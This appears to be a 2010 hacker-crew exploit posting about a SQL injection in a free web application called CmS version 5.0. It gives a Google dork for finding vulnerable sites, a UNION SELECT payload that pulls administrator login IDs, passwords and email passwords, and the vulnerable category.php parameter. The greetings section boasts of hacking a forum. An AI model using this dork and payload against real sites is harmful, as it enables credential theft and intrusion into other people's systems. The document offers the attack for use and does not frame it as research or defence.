-----------------------------------------------------------------------
CmS (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : spykit
Site : http://devilzc0de.org/
Date : April, 22-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : CmS
Vendor : http://hotsweb.com
Price : free
Version : version 5.0
Google Dork: allinurl: Category.php?IndustrYID=
---------------------------------------------------------------
Exploitz:
~~~~~~~
union all select
1,2,concat_ws(0x3a,LoginID,Password,AdminEmail,AdminEmailPassword) from
admin--
SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/category.php?IndustryID=[SQLI]
----------------------------------------------------------------
Shoutz:
~~~~
- 'oH lawd !! Malingsial lame forum g0t hacked for second times by
Us,lulz...'
-
LeQhi,lingah,GheMaX,v3n0m,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR,xtr0nic,adwisatya, and all member crew devilzc0de...
-hendri_note: jgn suka ngambek kang malu sama umur.. bruakkakaka
- #devilzc0de @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~
spykit | devilzc0de CREW | daniel_sapuleka@yahoo.com
Homepage: http://devilzc0de.org
---------------------------[EOF]--------------------------------